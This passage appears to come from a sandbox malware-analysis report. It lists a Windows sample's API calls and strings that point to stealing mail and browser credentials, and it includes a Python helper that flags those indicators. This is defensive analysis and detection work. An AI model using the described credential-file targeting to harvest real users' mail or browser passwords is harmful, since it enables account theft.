                  • String ID:
                  • API String ID: 409945605-0
                  • Opcode ID: 46f915da22a8394e3ccfb75a6a67a5d073b6093023bbcacd313ffdd2da9d0fc7
                  • Instruction ID: b2d480601b656eadb7f9024a04999e6b50b11c93cc119ce3783244db306e4add
                  • Opcode Fuzzy Hash: 46f915da22a8394e3ccfb75a6a67a5d073b6093023bbcacd313ffdd2da9d0fc7
                  • Instruction Fuzzy Hash: 5811F7B5900208AFCB10DFA9D9889EEBBF8FB49315F10447AE905E7250D739DA46CF64
                  APIs
                    • Part of subcall function 00405ED5: CreateFileA.KERNEL32(0041133F,80000000,00000001,00000000,00000003,00000000,00000000,0041127B,0041141B,?,0041133F,?,?,*.oeaccount,0041141B,?), ref: 00405EE7
                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040D064,00000000,0040D972,?,?,00000104,00000000,?,0040D972,?,00000000), ref: 00411C1E
                  • ??2@YAPAXI@Z.MSVCRT ref: 00411C2A
                    • Part of subcall function 00406725: ReadFile.KERNEL32(?,0041141B,?,00000000,00000000,?,?,004112BE,0041141B,00000000,-00000002,?,0041133F,?,?,*.oeaccount), ref: 0040673C
                  • CloseHandle.KERNEL32(0040D972,00000000,?,0040D972,?,00000000,?,?,?,?,?,?), ref: 00411C58
                  • ??3@YAXPAX@Z.MSVCRT ref: 00411C63
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$??2@??3@CloseCreateHandleReadSize
                  • String ID:
                  • API String ID: 1968906679-0
                  • Opcode ID: 81dc463ec2356049af3ece681b76481b2013d83dc9d852187db2e126e8957335
                  • Instruction ID: 7eee50cd159b1862f9f77aaf36d5f43b0d65e01e2e9cd2c6863135ac6fea6ec1
                  • Opcode Fuzzy Hash: 81dc463ec2356049af3ece681b76481b2013d83dc9d852187db2e126e8957335
                  • Instruction Fuzzy Hash: 7801A231004104AAD711AF35DC09FDB3FA99F46374F15C12AF5188B2A1EB7A8650C7A9
                  APIs
                    • Part of subcall function 00407A69: LoadStringA.USER32(00000000,0000000D,00000FFF,?), ref: 00407B32
                    • Part of subcall function 00407A69: memcpy.MSVCRT ref: 00407B71
                  • sprintf.MSVCRT ref: 0040A5C7
                  • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A62A
                    • Part of subcall function 00407A69: strcpy.MSVCRT(004182C0,strings,?,?,0040898C,?,?,?,?,?,00000000,76F90A60), ref: 00407AE4
                    • Part of subcall function 00407A69: strlen.MSVCRT ref: 00407B02
                  • sprintf.MSVCRT ref: 0040A5F1
                  • strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A604
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: sprintf$LoadMessageSendStringmemcpystrcatstrcpystrlen
                  • String ID:
                  • API String ID: 919693953-0
                  • Opcode ID: 958ab865ac69a3c4c3d9128656c309624dbea8e97793038db77fe03c7bb4008b
                  • Instruction ID: 49acf1ec04927684f0e14b468f671fa247d4e43980f6f5764d7eadf86f6a0ac4
                  • Opcode Fuzzy Hash: 958ab865ac69a3c4c3d9128656c309624dbea8e97793038db77fe03c7bb4008b
                  • Instruction Fuzzy Hash: 8A01DBB190030467D720F7B4CD86FDB73ACAB04304F04046FB755F61C2DAB9E6948A69
                  APIs
                  • memset.MSVCRT ref: 0040FA4D
                  • strlen.MSVCRT ref: 0040FA55
                  • strlen.MSVCRT ref: 0040FA62
                    • Part of subcall function 004062B7: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062BF
                    • Part of subcall function 004062B7: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062CE
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strlen$memsetstrcatstrcpy
                  • String ID: sqlite3.dll
                  • API String ID: 1581230619-1155512374
                  • Opcode ID: 16108ddf4f13ffc1d1035336796fcbbad104ce4c6981e8ccb6bc320039be4e03
                  • Instruction ID: 4f80a8773c1d4988f6668b9143c1107d12609c3bb00905d80200812c675c4c4f
                  • Opcode Fuzzy Hash: 16108ddf4f13ffc1d1035336796fcbbad104ce4c6981e8ccb6bc320039be4e03
                  • Instruction Fuzzy Hash: F6F0427250C1186EDB20E769DC45FC977AC8F60318F1000B7F589E60C2DAF8D6C58668
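The entries above (LoadLibraryA/GetProcAddress resolving SHGetSpecialFolderPathA at 0040F42B, the sqlite3.dll and nss3.dll strings passed through strcpy at 004062BF, the CreateFileA on *.oeaccount at 00405EE7 and the RegQueryValueExA subcall at 0040F22A) are the call/string combinations an analyst pulls out of this report to back the "Tries to steal Mail credentials" verdict. The Python below is an added example, not Joe Sandbox code and not part of the analysed sample: it parses entries written in the report's own layout (the "APIs" list, then the "API ID" / "String ID" lines under "Similarity") and flags those combinations. The excerpt it parses is copied from the entries above and trimmed to the lines the parser reads; the indicator labels and the triage function are my own wording.

```python
"""Triage helper for per-function API summaries in a Joe Sandbox report.

Added example; not Joe Sandbox code and not part of the analysed sample.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed excerpt: three entries copied from the report and trimmed to the
# lines this parser reads (memory-dump and hash lines dropped).
REPORT_EXCERPT = """\
APIs
• LoadLibraryA.KERNEL32(shell32.dll,0040BBB8,76F90A60,?,00000000), ref: 0040F42B
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040F440
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: SHGetSpecialFolderPathA$shell32.dll
APIs
• memset.MSVCRT ref: 0040FA4D
• strlen.MSVCRT ref: 0040FA55
  • Part of subcall function 004062B7: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062BF
Strings
Similarity
• API ID: strlen$memsetstrcatstrcpy
• String ID: sqlite3.dll
APIs
  • Part of subcall function 00405ED5: CreateFileA.KERNEL32(0041133F,80000000,00000001,00000000,00000003,00000000,00000000,0041127B,0041141B,?,0041133F,?,?,*.oeaccount,0041141B,?), ref: 00405EE7
• CloseHandle.KERNEL32(0040D972,00000000,?,0040D972,?,00000000,?,?,?,?,?,?), ref: 00411C58
Similarity
• API ID: File$??2@??3@CloseCreateHandleReadSize
• String ID:
"""

# One "• Name.MODULE(args), ref: ADDR" line, with the optional
# "Part of subcall function XXXXXXXX:" prefix the report adds for callees.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>[^.\s]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: str               # raw argument list as printed; '?' means unresolved
    ref: str                # call-site address (hex, as printed)
    subcall: Optional[str]  # parent function address for "Part of subcall" lines


@dataclass
class FunctionEntry:
    calls: List[ApiCall] = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""

    def strings(self) -> List[str]:
        # String IDs are '$'-joined; an empty String ID yields no strings.
        return [s for s in self.string_id.split("$") if s]


def parse_entries(text: str) -> List[FunctionEntry]:
    """Split report text into one FunctionEntry per 'APIs' heading."""
    entries: List[FunctionEntry] = []
    current: Optional[FunctionEntry] = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = FunctionEntry()
            entries.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            current.calls.append(ApiCall(m["name"], m["module"], m["args"] or "",
                                         m["ref"], m["sub"]))
        elif stripped.startswith("• API ID:"):
            current.api_id = stripped.split(":", 1)[1].strip()
        elif stripped.startswith("• String ID:"):
            current.string_id = stripped.split(":", 1)[1].strip()
    return entries


def flag_indicators(entry: FunctionEntry) -> List[str]:
    """Indicator labels (my own wording) for one entry; empty when none match."""
    names = {c.name for c in entry.calls}
    blob = " ".join([c.args for c in entry.calls] + entry.strings()).lower()
    hits = []
    if {"LoadLibraryA", "GetProcAddress"} <= names:
        hits.append("dynamic API resolution (LoadLibraryA + GetProcAddress)")
    if "nss3.dll" in blob or "sqlite3.dll" in blob:
        hits.append("loads Mozilla NSS / SQLite libraries (Firefox, Thunderbird profile databases)")
    if ".oeaccount" in blob:
        hits.append("opens *.oeaccount files (Windows Mail / Windows Live Mail account settings)")
    if "RegQueryValueExA" in names:
        hits.append("reads registry values")
    return hits


def triage(text: str) -> List[dict]:
    """Parse the text and return only the entries that raised an indicator."""
    results = []
    for entry in parse_entries(text):
        hits = flag_indicators(entry)
        if hits:
            results.append({"first_ref": entry.calls[0].ref if entry.calls else None,
                            "api_id": entry.api_id, "hits": hits})
    return results


if __name__ == "__main__":
    for row in triage(REPORT_EXCERPT):
        print(row["first_ref"], row["api_id"], "->", "; ".join(row["hits"]))
```

Paste further entries from the report into the excerpt (or read the whole saved report) to extend the sweep. Note the limit: arguments the static pass could not resolve are printed as `?`, so a string only matches here when it was recovered at analysis time; the String ID line is the second chance, which is why both are folded into the match.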
                  APIs
                  • memset.MSVCRT ref: 00409A8A
                  • memset.MSVCRT ref: 00409AA0
                    • Part of subcall function 0040918B: strcpy.MSVCRT(00000000,?,00409874,?,?,?), ref: 00409190
                    • Part of subcall function 0040918B: _strlwr.MSVCRT ref: 004091D3
                  • sprintf.MSVCRT ref: 00409ACA
                    • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
                    • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,76F90A60,00000000,?,?,00409460,00000001,00413B1C,76F90A60), ref: 00405F21
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                  • String ID: </%s>
                  • API String ID: 3202206310-259020660
                  • Opcode ID: 637a9c7a3fbe891b17e74324215966cd4ae9ffaeb73701361f90968b62e1fe90
                  • Instruction ID: 3d0bab8d804eeed29aac85efced1b4409724b73b0f4afa6070eee5aab36d753a
                  • Opcode Fuzzy Hash: 637a9c7a3fbe891b17e74324215966cd4ae9ffaeb73701361f90968b62e1fe90
                  • Instruction Fuzzy Hash: A801F9729001296BD720A259CC45FDB7B6C9F54304F0400FAB60DF3142D6B49A94CBA5
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: bbf8de8405f53124a46ce5bf03d70c3b21be83380051b215e87da0a01535b9bd
                  • Instruction ID: d787685a6615fa8e7b12f25043f2ee1a52758ce9b2ab1ab1a3353857822e9c29
                  • Opcode Fuzzy Hash: bbf8de8405f53124a46ce5bf03d70c3b21be83380051b215e87da0a01535b9bd
                  • Instruction Fuzzy Hash: 8FE012703003206A8E30EB7ABF41AC327CDAA18351394C02EF609D2282DEA8DCE0C42C
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: _ultoasprintf
                  • String ID: %s %s %s
                  • API String ID: 432394123-3850900253
                  • Opcode ID: ad10a0a60f11ae5ad813c548426d3cbfbdd2c873bbe0414cf6ac4599a9575019
                  • Instruction ID: 4550bc8a79151648f87db51bd02682248f93ba3dc48fc4e36bbc9480066499b4
                  • Opcode Fuzzy Hash: ad10a0a60f11ae5ad813c548426d3cbfbdd2c873bbe0414cf6ac4599a9575019
                  • Instruction Fuzzy Hash: F741F731904B16C7CA34956487CCBEBA298E702304F6504BFDC5AF72D0D2FCAE46866B
                  APIs
                  • SendMessageA.USER32(?,0000101A,00000000,?), ref: 00408597
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessageSend
                  • String ID: "$\LA
                  • API String ID: 3850602802-1791104459
                  • Opcode ID: 6730269ec323a4575099126faff27654677e2dead0fd5bf6d10708e601ad3506
                  • Instruction ID: ec77e5a748e9a6ff816ea2aa2a284b6bdb41b89871e7a2a93e67b2087f5a6bee
                  • Opcode Fuzzy Hash: 6730269ec323a4575099126faff27654677e2dead0fd5bf6d10708e601ad3506
                  • Instruction Fuzzy Hash: 52115171A00115AEDB149F9ACEC04BEB7F5FB98305B50843FD1D6E7680DB789982CB58
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strlen$FileFindFirst
                  • String ID: *.*$prefs.js
                  • API String ID: 2516927864-1592826420
                  • Opcode ID: 6a000196e6438ec39e637ca0eb5d4ae5762e5a1622c1bb359a3e97ee416ced3e
                  • Instruction ID: 0a1894bf97bc7f37e7ea977f35cd1e9cdc16bb9bd7797736beedadfbd1967f85
                  • Opcode Fuzzy Hash: 6a000196e6438ec39e637ca0eb5d4ae5762e5a1622c1bb359a3e97ee416ced3e
                  • Instruction Fuzzy Hash: 1811947250C3465ED720EAA58C01ADB7BD89F55314F14863FF898E21C2D738D61DCB9A
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileNameSavestrcpy
                  • String ID: L
                  • API String ID: 1182090483-2909332022
                  • Opcode ID: 2aa07690fce79c473fa63c108ae99b2fccd51bdc1973966a0ba636b15db491df
                  • Instruction ID: d41a0f3581961b0f058ab7b38d8a0fc10f69f88ca1386dcb34cd33e007bc3755
                  • Opcode Fuzzy Hash: 2aa07690fce79c473fa63c108ae99b2fccd51bdc1973966a0ba636b15db491df
                  • Instruction Fuzzy Hash: D301E9B1D102099FDF10DFA9D8847AEBBF4BF08319F10442AE915E6340DB749955CF54
                  APIs
                  • LoadMenuA.USER32(00000000), ref: 00407D2B
                  • sprintf.MSVCRT ref: 00407D4E
                    • Part of subcall function 00407BCE: GetMenuItemCount.USER32(?), ref: 00407BE4
                    • Part of subcall function 00407BCE: memset.MSVCRT ref: 00407C08
                    • Part of subcall function 00407BCE: GetMenuItemInfoA.USER32(?), ref: 00407C3E
                    • Part of subcall function 00407BCE: memset.MSVCRT ref: 00407C6B
                    • Part of subcall function 00407BCE: strchr.MSVCRT ref: 00407C77
                    • Part of subcall function 00407BCE: strcat.MSVCRT(?,?,?,?,?,00000001,?), ref: 00407CD2
                    • Part of subcall function 00407BCE: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00407CEE
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Menu$Itemmemset$CountInfoLoadModifysprintfstrcatstrchr
                  • String ID: menu_%d
                  • API String ID: 3671758413-2417748251
                  • Opcode ID: 49ac11d1195a608e742f3e6ca3ff2f5e26bbcd1b47ce44f2e641ce1c3c472826
                  • Instruction ID: 2770b7a066d609e077f5412e4a2b93c9a9718e974603bd13de201155b170d4e3
                  • Opcode Fuzzy Hash: 49ac11d1195a608e742f3e6ca3ff2f5e26bbcd1b47ce44f2e641ce1c3c472826
                  • Instruction Fuzzy Hash: 25D0C271A4911036CB2133366C0AFDB3C288BD2719F28406EF000650C1CABCA182827E
                  APIs
                    • Part of subcall function 0040616A: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,004084B8,00000000,004083D6,?,00000000,00000104,?), ref: 00406175
                  • strrchr.MSVCRT ref: 004084BB
                  • strcat.MSVCRT(00000000,_lng.ini,00000000,00000104,?), ref: 004084D0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileModuleNamestrcatstrrchr
                  • String ID: _lng.ini
                  • API String ID: 3097366151-1948609170
                  • Opcode ID: 2d253c9011988194c7ab29affedf6fb1a5ea8153034ac82cdf8f1fb697810a88
                  • Instruction ID: 42c27a01d44ad3a484ea9941e8a753782f6a4a1a49f0a0828630b4f1254f47e7
                  • Opcode Fuzzy Hash: 2d253c9011988194c7ab29affedf6fb1a5ea8153034ac82cdf8f1fb697810a88
                  • Instruction Fuzzy Hash: 98C0126924565024D12621215E03B8A09494F26319F24416BF501781C3EE9C46E1806E
                  APIs
                  • ShellExecuteA.SHELL32(00418388,open,?,0041344F,0041344F,00000005), ref: 00406568
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExecuteShell
                  • String ID: O4A$open
                  • API String ID: 587946157-3166864092
                  • Opcode ID: 9e6802b33b5cac27b58214f79fa19b5d011751a3236ad9fa1aa3ed0329bb7868
                  • Instruction ID: 449ca028383310d53200be1944a6bd751f504fbe34d0cfd866494f64672fa994
                  • Opcode Fuzzy Hash: 9e6802b33b5cac27b58214f79fa19b5d011751a3236ad9fa1aa3ed0329bb7868
                  • Instruction Fuzzy Hash: C5C012B12902027AEA114E30EC09F6A7A98DB84F02F104429B601E80E0DB5188885A1E
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeLocalmemcpymemsetstrlen
                  • String ID:
                  • API String ID: 3110682361-0
                  • Opcode ID: 4a01b5491f9ecde230b25e47fc41df6e3a48aedd09d870957f2f4d0e5019b56d
                  • Instruction ID: a7b320da169f7f969887caa54c031871a44602910a4795043d90d4c59a740d9e
                  • Opcode Fuzzy Hash: 4a01b5491f9ecde230b25e47fc41df6e3a48aedd09d870957f2f4d0e5019b56d
                  • Instruction Fuzzy Hash: B0312972D0011D9BDB10DB68CC81BDEBBB8EF45318F1006B6E545B3281DA79AE858B95
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ??2@$memset
                  • String ID:
                  • API String ID: 1860491036-0
                  • Opcode ID: eb03ff296926441e48f35a82af38a44947cfbfa61d2a0b9abfff05ba54c8add2
                  • Instruction ID: a93534bcf4590af08eae181cf0f7bc47295f2e33990000f3cf4a50e67893865e
                  • Opcode Fuzzy Hash: eb03ff296926441e48f35a82af38a44947cfbfa61d2a0b9abfff05ba54c8add2
                  • Instruction Fuzzy Hash: 8421E7B0A003008ED7519F2A9645A55FBE4FF9431072AC9AFD259CB3B2DBF9C880DB14
                  APIs
                  • strlen.MSVCRT ref: 00406AAF
                  • free.MSVCRT(?,00000001,?,00000000,?,?,00406F39,?,00000000,?,?), ref: 00406ACF
                    • Part of subcall function 00406104: malloc.MSVCRT ref: 00406120
                    • Part of subcall function 00406104: memcpy.MSVCRT ref: 00406138
                    • Part of subcall function 00406104: free.MSVCRT(00000000,00000000,76F90A60,00406B78,00000001,?,00000000,76F90A60,00406EF2,00000000,?,?), ref: 00406141
                  • free.MSVCRT(?,00000001,?,00000000,?,?,00406F39,?,00000000,?,?), ref: 00406AF2
                  • memcpy.MSVCRT ref: 00406B12
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: free$memcpy$mallocstrlen
                  • String ID:
                  • API String ID: 3669619086-0
                  • Opcode ID: fe556f8fd747337398a4671f90261db5b892e00cab488469f465dd59fda81595
                  • Instruction ID: b9d8f5a2f56f362531d37561c783707772d91941aea6ec8fb4057fc73eb697f3
                  • Opcode Fuzzy Hash: fe556f8fd747337398a4671f90261db5b892e00cab488469f465dd59fda81595
                  • Instruction Fuzzy Hash: A7119D72200600EFD730EF18D88199AB7F5EF48324B108A2EF556A7692C7B5FD25CB54